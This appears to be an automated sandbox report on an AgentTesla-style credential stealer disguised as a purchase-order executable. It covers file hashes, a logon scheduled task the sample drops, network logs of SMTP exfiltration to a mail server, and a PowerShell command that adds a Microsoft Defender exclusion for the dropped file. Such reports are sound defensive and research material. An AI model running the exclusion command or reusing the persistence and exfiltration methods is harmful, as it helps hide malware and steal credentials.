                                                      MD5:87A79526FD6CB18E3C5266FFD7E278B9
                                                      SHA1:60ED5F3809B6B78342E40A543586D6AA4E3F28A4
                                                      SHA-256:19DE306359FDC90B31EC70B8B779E8998EE41C538C69BF997011BF98FAAD2A92
                                                      SHA-512:2D229C438FD382508175D7ADF9C481CF1A76FFA2648710DFE739D081A6742889A9F5488B281281C75DC3D862E25840BA79F553DC2F1F581072D33D602CBA21F2
                                                      Malicious:true
                                                      Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail
                                                      Process:C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exe
                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):666112
                                                      Entropy (8bit):7.9848095460234
                                                      Encrypted:false
                                                      SSDEEP:12288:gsJTENl3a+1+UxRhsZzc3LKEUfzPdvpkF55CSuGxCkckJ+ZWsfeXjZ:BxENllxzsZzALKxuHuG7JYWsWXjZ
                                                      MD5:876BDD759D990110A2BBD617B0F2C549
                                                      SHA1:DEC55C0273518038E0F2CDABE94D0D33E6FB1704
                                                      SHA-256:066BEB79D6FC244E4FC3DB3CAE1AF40749798A52F6B5796F14E3612E1498BF73
                                                      SHA-512:B3F8F1D0CC8A743E907877E699FEDF08FE0482AED2D7902A93497D773978BF01D0E78A81341DCD5A6FF0019CFDF43F1CD68D7952DC9F853B2DD2EECC471A23B6
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 66%
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....&}...............0.............n7... ...@....@.. ....................................@..................................7..O....@.......................`.......(..p............................................ ............... ..H............text...t.... ...................... ..`.rsrc........@......................@..@.reloc.......`.......(..............@..B................P7......H........5... ..........LV...............................................0...........(,....+..*..0..[.........o....r...p(....,2.o!...r...p(...., .o'... ....2..o....o..........+....,...(-....+....+..*..0.................,...(.....+....+..*...0..[.........o....r...p(....,2.o!...r...p(...., .o'... ....2..o....o..........+....,...(/....+....+..*".(.....*..r...p..*...%..^.(....}......}.....(.......(.....*..0...........(......{.....o.....*....0..n........s)......{....o....o ......{
                                                      Process:C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exe
                                                      File Type:ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):26
                                                      Entropy (8bit):3.95006375643621
                                                      Encrypted:false
                                                      SSDEEP:3:ggPYV:rPYV
                                                      MD5:187F488E27DB4AF347237FE461A079AD
                                                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                      Malicious:false
                                                      Preview:[ZoneTransfer]....ZoneId=0
                                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Entropy (8bit):7.9848095460234
                                                      TrID:
                                                      • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                      • Win32 Executable (generic) a (10002005/4) 49.78%
                                                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                                      • DOS Executable Generic (2002/1) 0.01%
                                                      File name:PUK ITALIA PO 120610549.EXE.exe
                                                      File size:666'112 bytes
                                                      MD5:876bdd759d990110a2bbd617b0f2c549
                                                      SHA1:dec55c0273518038e0f2cdabe94d0d33e6fb1704
                                                      SHA256:066beb79d6fc244e4fc3db3cae1af40749798a52f6b5796f14e3612e1498bf73
                                                      SHA512:b3f8f1d0cc8a743e907877e699fedf08fe0482aed2d7902a93497d773978bf01d0e78a81341dcd5a6ff0019cfdf43f1cd68d7952dc9f853b2dd2eecc471a23b6
                                                      SSDEEP:12288:gsJTENl3a+1+UxRhsZzc3LKEUfzPdvpkF55CSuGxCkckJ+ZWsfeXjZ:BxENllxzsZzALKxuHuG7JYWsWXjZ
                                                      TLSH:FEE423AEF39C2340DB7FA3BDA456416402F40CB2ADB0DB0DDD5C19C9772A78C62616A7
                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....&}...............0.............n7... ...@....@.. ....................................@................................
                                                      Icon Hash:292d296b43a5e54a
                                                      Entrypoint:0x4a376e
                                                      Entrypoint Section:.text
                                                      Digitally signed:false
                                                      Imagebase:0x400000
                                                      Subsystem:windows gui
                                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                      Time Stamp:0xE07D262E [Sat May 7 09:55:58 2089 UTC]
                                                      TLS Callbacks:
                                                      CLR (.Net) Version:
                                                      OS Version Major:4
                                                      OS Version Minor:0
                                                      File Version Major:4
                                                      File Version Minor:0
                                                      Subsystem Version Major:4
                                                      Subsystem Version Minor:0
                                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                      Instruction
                                                      jmp dword ptr [00402000h]
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      NameVirtual AddressVirtual Size Is in Section
                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0xa371c0x4f.text
                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0xa40000xcac.rsrc
                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0xa60000xc.reloc
                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0xa28cc0x70.text
                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                      .text0x20000xa17740xa18003c54b49f34871711307a25264fcf30ccFalse0.9851278299148607data7.990207486581012IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                      .rsrc0xa40000xcac0xe00a591a6f61e54fc572a10e779fa8c9fdcFalse0.40122767857142855data4.842958974175906IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                      .reloc0xa60000xc0x2000f4edaaacebd6bd1f905ab022d0be02bFalse0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                      RT_ICON0xa41300x658Device independent bitmap graphic, 21 x 36 x 32, image size 15840.43903940886699505
                                                      RT_GROUP_ICON0xa47880x14data1.05
                                                      RT_VERSION0xa479c0x324data0.43034825870646765
                                                      RT_MANIFEST0xa4ac00x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
                                                      DLLImport
                                                      mscoree.dll_CorExeMain
                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Mar 14, 2024 17:28:58.794111967 CET49732443192.168.2.4104.26.12.205
                                                      Mar 14, 2024 17:28:58.794147015 CET44349732104.26.12.205192.168.2.4
                                                      Mar 14, 2024 17:28:58.794214010 CET49732443192.168.2.4104.26.12.205
                                                      Mar 14, 2024 17:28:58.804683924 CET49732443192.168.2.4104.26.12.205
                                                      Mar 14, 2024 17:28:58.804712057 CET44349732104.26.12.205192.168.2.4
                                                      Mar 14, 2024 17:28:58.993531942 CET44349732104.26.12.205192.168.2.4
                                                      Mar 14, 2024 17:28:58.993614912 CET49732443192.168.2.4104.26.12.205
                                                      Mar 14, 2024 17:28:58.997159958 CET49732443192.168.2.4104.26.12.205
                                                      Mar 14, 2024 17:28:58.997173071 CET44349732104.26.12.205192.168.2.4
                                                      Mar 14, 2024 17:28:58.997409105 CET44349732104.26.12.205192.168.2.4
                                                      Mar 14, 2024 17:28:59.042800903 CET49732443192.168.2.4104.26.12.205
                                                      Mar 14, 2024 17:28:59.059776068 CET49732443192.168.2.4104.26.12.205
                                                      Mar 14, 2024 17:28:59.104245901 CET44349732104.26.12.205192.168.2.4
                                                      Mar 14, 2024 17:28:59.270425081 CET44349732104.26.12.205192.168.2.4
                                                      Mar 14, 2024 17:28:59.270509005 CET44349732104.26.12.205192.168.2.4
                                                      Mar 14, 2024 17:28:59.270595074 CET49732443192.168.2.4104.26.12.205
                                                      Mar 14, 2024 17:28:59.274272919 CET49732443192.168.2.4104.26.12.205
                                                      Mar 14, 2024 17:29:00.293486118 CET49733587192.168.2.4192.254.186.165
                                                      Mar 14, 2024 17:29:00.468554974 CET58749733192.254.186.165192.168.2.4
                                                      Mar 14, 2024 17:29:00.468669891 CET49733587192.168.2.4192.254.186.165
                                                      Mar 14, 2024 17:29:00.793351889 CET58749733192.254.186.165192.168.2.4
                                                      Mar 14, 2024 17:29:00.793579102 CET49733587192.168.2.4192.254.186.165
                                                      Mar 14, 2024 17:29:00.973495007 CET58749733192.254.186.165192.168.2.4
                                                      Mar 14, 2024 17:29:00.973670006 CET49733587192.168.2.4192.254.186.165
                                                      Mar 14, 2024 17:29:01.148730993 CET58749733192.254.186.165192.168.2.4
                                                      Mar 14, 2024 17:29:01.149146080 CET49733587192.168.2.4192.254.186.165
                                                      Mar 14, 2024 17:29:01.340735912 CET58749733192.254.186.165192.168.2.4
                                                      Mar 14, 2024 17:29:01.340763092 CET58749733192.254.186.165192.168.2.4
                                                      Mar 14, 2024 17:29:01.340826035 CET58749733192.254.186.165192.168.2.4
                                                      Mar 14, 2024 17:29:01.340842962 CET58749733192.254.186.165192.168.2.4
                                                      Mar 14, 2024 17:29:01.340857983 CET58749733192.254.186.165192.168.2.4
                                                      Mar 14, 2024 17:29:01.340852976 CET49733587192.168.2.4192.254.186.165
                                                      Mar 14, 2024 17:29:01.340966940 CET49733587192.168.2.4192.254.186.165
                                                      Mar 14, 2024 17:29:01.384531021 CET49733587192.168.2.4192.254.186.165
                                                      Mar 14, 2024 17:29:01.560276985 CET58749733192.254.186.165192.168.2.4
                                                      Mar 14, 2024 17:29:01.564778090 CET49733587192.168.2.4192.254.186.165
                                                      Mar 14, 2024 17:29:01.738084078 CET58749733192.254.186.165192.168.2.4
                                                      Mar 14, 2024 17:29:01.739291906 CET49733587192.168.2.4192.254.186.165
                                                      Mar 14, 2024 17:29:01.912852049 CET58749733192.254.186.165192.168.2.4
                                                      Mar 14, 2024 17:29:01.913259983 CET49733587192.168.2.4192.254.186.165
                                                      Mar 14, 2024 17:29:02.127039909 CET58749733192.254.186.165192.168.2.4
                                                      Mar 14, 2024 17:29:02.174201965 CET58749733192.254.186.165192.168.2.4
                                                      Mar 14, 2024 17:29:02.174510002 CET49733587192.168.2.4192.254.186.165
                                                      Mar 14, 2024 17:29:02.347558975 CET58749733192.254.186.165192.168.2.4
                                                      Mar 14, 2024 17:29:02.348273039 CET58749733192.254.186.165192.168.2.4
                                                      Mar 14, 2024 17:29:02.348742008 CET49733587192.168.2.4192.254.186.165
                                                      Mar 14, 2024 17:29:02.527319908 CET58749733192.254.186.165192.168.2.4
                                                      Mar 14, 2024 17:29:02.527630091 CET49733587192.168.2.4192.254.186.165
                                                      Mar 14, 2024 17:29:02.700711012 CET58749733192.254.186.165192.168.2.4
                                                      Mar 14, 2024 17:29:02.701366901 CET49733587192.168.2.4192.254.186.165
                                                      Mar 14, 2024 17:29:02.701445103 CET49733587192.168.2.4192.254.186.165
                                                      Mar 14, 2024 17:29:02.701486111 CET49733587192.168.2.4192.254.186.165
                                                      Mar 14, 2024 17:29:02.701530933 CET49733587192.168.2.4192.254.186.165
                                                      Mar 14, 2024 17:29:02.874497890 CET58749733192.254.186.165192.168.2.4
                                                      Mar 14, 2024 17:29:02.874515057 CET58749733192.254.186.165192.168.2.4
                                                      Mar 14, 2024 17:29:02.875011921 CET58749733192.254.186.165192.168.2.4
                                                      Mar 14, 2024 17:29:02.917819977 CET49733587192.168.2.4192.254.186.165
                                                      Mar 14, 2024 17:29:02.921111107 CET49733587192.168.2.4192.254.186.165
                                                      Mar 14, 2024 17:29:03.135020018 CET58749733192.254.186.165192.168.2.4
                                                      Mar 14, 2024 17:29:03.487068892 CET58749733192.254.186.165192.168.2.4
                                                      Mar 14, 2024 17:29:03.487620115 CET49733587192.168.2.4192.254.186.165
                                                      Mar 14, 2024 17:29:03.489542961 CET49736587192.168.2.4192.254.186.165
                                                      Mar 14, 2024 17:29:03.663440943 CET58749736192.254.186.165192.168.2.4
                                                      Mar 14, 2024 17:29:03.663537025 CET49736587192.168.2.4192.254.186.165
                                                      Mar 14, 2024 17:29:03.942075014 CET58749736192.254.186.165192.168.2.4
                                                      Mar 14, 2024 17:29:03.942219973 CET49736587192.168.2.4192.254.186.165
                                                      Mar 14, 2024 17:29:04.116715908 CET58749736192.254.186.165192.168.2.4
                                                      Mar 14, 2024 17:29:04.116878033 CET49736587192.168.2.4192.254.186.165
                                                      Mar 14, 2024 17:29:04.292181969 CET58749736192.254.186.165192.168.2.4
                                                      Mar 14, 2024 17:29:04.292658091 CET49736587192.168.2.4192.254.186.165
                                                      Mar 14, 2024 17:29:04.481046915 CET58749736192.254.186.165192.168.2.4
                                                      Mar 14, 2024 17:29:04.481142998 CET58749736192.254.186.165192.168.2.4
                                                      Mar 14, 2024 17:29:04.481193066 CET58749736192.254.186.165192.168.2.4
                                                      Mar 14, 2024 17:29:04.481218100 CET58749736192.254.186.165192.168.2.4
                                                      Mar 14, 2024 17:29:04.481235027 CET58749736192.254.186.165192.168.2.4
                                                      Mar 14, 2024 17:29:04.481256962 CET49736587192.168.2.4192.254.186.165
                                                      Mar 14, 2024 17:29:04.481282949 CET49736587192.168.2.4192.254.186.165
                                                      Mar 14, 2024 17:29:04.483380079 CET49736587192.168.2.4192.254.186.165
                                                      Mar 14, 2024 17:29:04.658623934 CET58749736192.254.186.165192.168.2.4
                                                      Mar 14, 2024 17:29:04.659616947 CET49736587192.168.2.4192.254.186.165
                                                      Mar 14, 2024 17:29:04.833197117 CET58749736192.254.186.165192.168.2.4
                                                      Mar 14, 2024 17:29:04.833554983 CET49736587192.168.2.4192.254.186.165
                                                      Mar 14, 2024 17:29:05.007585049 CET58749736192.254.186.165192.168.2.4
                                                      Mar 14, 2024 17:29:05.010698080 CET49736587192.168.2.4192.254.186.165
                                                      Mar 14, 2024 17:29:05.188172102 CET58749736192.254.186.165192.168.2.4
                                                      Mar 14, 2024 17:29:05.190253973 CET49736587192.168.2.4192.254.186.165
                                                      Mar 14, 2024 17:29:05.363696098 CET58749736192.254.186.165192.168.2.4
                                                      Mar 14, 2024 17:29:05.364294052 CET49736587192.168.2.4192.254.186.165
                                                      Mar 14, 2024 17:29:05.543755054 CET58749736192.254.186.165192.168.2.4
                                                      Mar 14, 2024 17:29:05.546444893 CET49736587192.168.2.4192.254.186.165
                                                      Mar 14, 2024 17:29:05.720598936 CET58749736192.254.186.165192.168.2.4
                                                      Mar 14, 2024 17:29:05.729434013 CET49736587192.168.2.4192.254.186.165
                                                      Mar 14, 2024 17:29:05.729528904 CET49736587192.168.2.4192.254.186.165
                                                      Mar 14, 2024 17:29:05.729579926 CET49736587192.168.2.4192.254.186.165
                                                      Mar 14, 2024 17:29:05.729660034 CET49736587192.168.2.4192.254.186.165
                                                      Mar 14, 2024 17:29:05.729790926 CET49736587192.168.2.4192.254.186.165
                                                      Mar 14, 2024 17:29:05.729888916 CET49736587192.168.2.4192.254.186.165
                                                      Mar 14, 2024 17:29:05.729953051 CET49736587192.168.2.4192.254.186.165
                                                      Mar 14, 2024 17:29:05.729995012 CET49736587192.168.2.4192.254.186.165
                                                      Mar 14, 2024 17:29:05.730040073 CET49736587192.168.2.4192.254.186.165
                                                      Mar 14, 2024 17:29:05.902865887 CET58749736192.254.186.165192.168.2.4
                                                      Mar 14, 2024 17:29:05.902925968 CET58749736192.254.186.165192.168.2.4
                                                      Mar 14, 2024 17:29:05.903198004 CET58749736192.254.186.165192.168.2.4
                                                      Mar 14, 2024 17:29:05.903270960 CET58749736192.254.186.165192.168.2.4
                                                      Mar 14, 2024 17:29:05.903462887 CET58749736192.254.186.165192.168.2.4
                                                      Mar 14, 2024 17:29:05.903712034 CET58749736192.254.186.165192.168.2.4
                                                      Mar 14, 2024 17:29:05.903748989 CET58749736192.254.186.165192.168.2.4
                                                      Mar 14, 2024 17:29:05.904375076 CET58749736192.254.186.165192.168.2.4
                                                      Mar 14, 2024 17:29:05.949049950 CET49736587192.168.2.4192.254.186.165
                                                      Mar 14, 2024 17:30:39.996119022 CET49736587192.168.2.4192.254.186.165
                                                      Mar 14, 2024 17:30:40.210159063 CET58749736192.254.186.165192.168.2.4
                                                      Mar 14, 2024 17:30:40.559231997 CET58749736192.254.186.165192.168.2.4
                                                      Mar 14, 2024 17:30:40.559906960 CET49736587192.168.2.4192.254.186.165
                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Mar 14, 2024 17:28:58.696681023 CET5024753192.168.2.41.1.1.1
                                                      Mar 14, 2024 17:28:58.784841061 CET53502471.1.1.1192.168.2.4
                                                      Mar 14, 2024 17:28:59.979574919 CET5961053192.168.2.41.1.1.1
                                                      Mar 14, 2024 17:29:00.291466951 CET53596101.1.1.1192.168.2.4
                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                      Mar 14, 2024 17:28:58.696681023 CET192.168.2.41.1.1.10x71d0Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                      Mar 14, 2024 17:28:59.979574919 CET192.168.2.41.1.1.10x5ff6Standard query (0)mail.alltoursegypt.comA (IP address)IN (0x0001)false
                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                      Mar 14, 2024 17:28:58.784841061 CET1.1.1.1192.168.2.40x71d0No error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                                      Mar 14, 2024 17:28:58.784841061 CET1.1.1.1192.168.2.40x71d0No error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                                      Mar 14, 2024 17:28:58.784841061 CET1.1.1.1192.168.2.40x71d0No error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                                      Mar 14, 2024 17:29:00.291466951 CET1.1.1.1192.168.2.40x5ff6No error (0)mail.alltoursegypt.comalltoursegypt.comCNAME (Canonical name)IN (0x0001)false
                                                      Mar 14, 2024 17:29:00.291466951 CET1.1.1.1192.168.2.40x5ff6No error (0)alltoursegypt.com192.254.186.165A (IP address)IN (0x0001)false
                                                      • api.ipify.org
                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      0192.168.2.449732104.26.12.2054436104C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-03-14 16:28:59 UTC155OUTGET / HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                      Host: api.ipify.org
                                                      Connection: Keep-Alive
                                                      2024-03-14 16:28:59 UTC211INHTTP/1.1 200 OK
                                                      Date: Thu, 14 Mar 2024 16:28:59 GMT
                                                      Content-Type: text/plain
                                                      Content-Length: 14
                                                      Connection: close
                                                      Vary: Origin
                                                      CF-Cache-Status: DYNAMIC
                                                      Server: cloudflare
                                                      CF-RAY: 8645a3d5bf7fc468-EWR
                                                      2024-03-14 16:28:59 UTC14INData Raw: 31 39 31 2e 39 36 2e 32 32 37 2e 31 39 34
                                                      Data Ascii: 191.96.227.194


                                                      TimestampSource PortDest PortSource IPDest IPCommands
                                                      Mar 14, 2024 17:29:00.793351889 CET58749733192.254.186.165192.168.2.4220-gator3170.hostgator.com ESMTP Exim 4.95 #2 Thu, 14 Mar 2024 11:29:00 -0500
                                                      220-We do not authorize the use of this system to transport unsolicited,
                                                      220 and/or bulk e-mail.
                                                      Mar 14, 2024 17:29:00.793579102 CET49733587192.168.2.4192.254.186.165EHLO 888683
                                                      Mar 14, 2024 17:29:00.973495007 CET58749733192.254.186.165192.168.2.4250-gator3170.hostgator.com Hello 888683 [191.96.227.194]
                                                      250-SIZE 52428800
                                                      250-8BITMIME
                                                      250-PIPELINING
                                                      250-PIPE_CONNECT
                                                      250-AUTH PLAIN LOGIN
                                                      250-STARTTLS
                                                      250 HELP
                                                      Mar 14, 2024 17:29:00.973670006 CET49733587192.168.2.4192.254.186.165STARTTLS
                                                      Mar 14, 2024 17:29:01.148730993 CET58749733192.254.186.165192.168.2.4220 TLS go ahead
                                                      Mar 14, 2024 17:29:03.942075014 CET58749736192.254.186.165192.168.2.4220-gator3170.hostgator.com ESMTP Exim 4.95 #2 Thu, 14 Mar 2024 11:29:03 -0500
                                                      220-We do not authorize the use of this system to transport unsolicited,
                                                      220 and/or bulk e-mail.
                                                      Mar 14, 2024 17:29:03.942219973 CET49736587192.168.2.4192.254.186.165EHLO 888683
                                                      Mar 14, 2024 17:29:04.116715908 CET58749736192.254.186.165192.168.2.4250-gator3170.hostgator.com Hello 888683 [191.96.227.194]
                                                      250-SIZE 52428800
                                                      250-8BITMIME
                                                      250-PIPELINING
                                                      250-PIPE_CONNECT
                                                      250-AUTH PLAIN LOGIN
                                                      250-STARTTLS
                                                      250 HELP
                                                      Mar 14, 2024 17:29:04.116878033 CET49736587192.168.2.4192.254.186.165STARTTLS
                                                      Mar 14, 2024 17:29:04.292181969 CET58749736192.254.186.165192.168.2.4220 TLS go ahead

                                                      Click to jump to process

                                                      Click to jump to process

                                                      Click to dive into process behavior distribution

                                                      Click to jump to process

                                                      Target ID:0
                                                      Start time:17:28:55
                                                      Start date:14/03/2024
                                                      Path:C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exe
                                                      Imagebase:0x1f0000
                                                      File size:666'112 bytes
                                                      MD5 hash:876BDD759D990110A2BBD617B0F2C549
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.4128077846.00000000070F0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.4128077846.00000000070F0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: 00000000.00000002.4128077846.00000000070F0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.4124370819.00000000038E8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.4124370819.00000000038E8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.4121165518.0000000002621000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.4121165518.000000000269F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.4121165518.000000000269F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      Reputation:low
                                                      Has exited:false

                                                      Target ID:2
                                                      Start time:17:28:57
                                                      Start date:14/03/2024
                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\FNOqSQ.exe
                                                      Imagebase:0xda0000
                                                      File size:433'152 bytes
                                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:3
                                                      Start time:17:28:57
                                                      Start date:14/03/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff7699e0000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

